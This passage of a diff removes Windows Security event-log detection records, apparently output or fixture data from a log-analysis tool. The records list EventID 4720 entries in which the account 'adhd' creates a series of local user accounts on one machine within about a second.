-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.2315533Z'/&gt;&lt;EventRecordID&gt;4123&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Barbara&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1013&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Barbara&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Barbara</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4117</recordid>
-            <time>2020-06-11 22:04:52.159400000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.1594000Z'/&gt;&lt;EventRecordID&gt;4117&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;George&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1012&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;George&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>George</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4111</recordid>
-            <time>2020-06-11 22:04:52.58821800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.0588218Z'/&gt;&lt;EventRecordID&gt;4111&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Amanda&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1011&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Amanda&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Amanda</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4105</recordid>
-            <time>2020-06-11 22:04:51.980650700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.9806507Z'/&gt;&lt;EventRecordID&gt;4105&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jane&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1010&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jane&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jane</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4099</recordid>
-            <time>2020-06-11 22:04:51.911812900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.9118129Z'/&gt;&lt;EventRecordID&gt;4099&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Albert&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1009&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Albert&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Albert</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4093</recordid>
-            <time>2020-06-11 22:04:51.823811400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.8238114Z'/&gt;&lt;EventRecordID&gt;4093&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jason&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1008&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jason&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jason</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4087</recordid>
-            <time>2020-06-11 22:04:51.745753600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.7457536Z'/&gt;&lt;EventRecordID&gt;4087&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ralph&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1007&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ralph&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ralph</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4081</recordid>
-            <time>2020-06-11 22:04:51.668192700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.6681927Z'/&gt;&lt;EventRecordID&gt;4081&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sandra&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1006&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sandra&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sandra</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4075</recordid>
-            <time>2020-06-11 22:04:51.584481200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.5844812Z'/&gt;&lt;EventRecordID&gt;4075&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jacqueline&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1005&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jacqueline&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jacqueline</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4069</recordid>
-            <time>2020-06-11 22:04:51.502859300Z</time>
-            <channel>Security</channel>
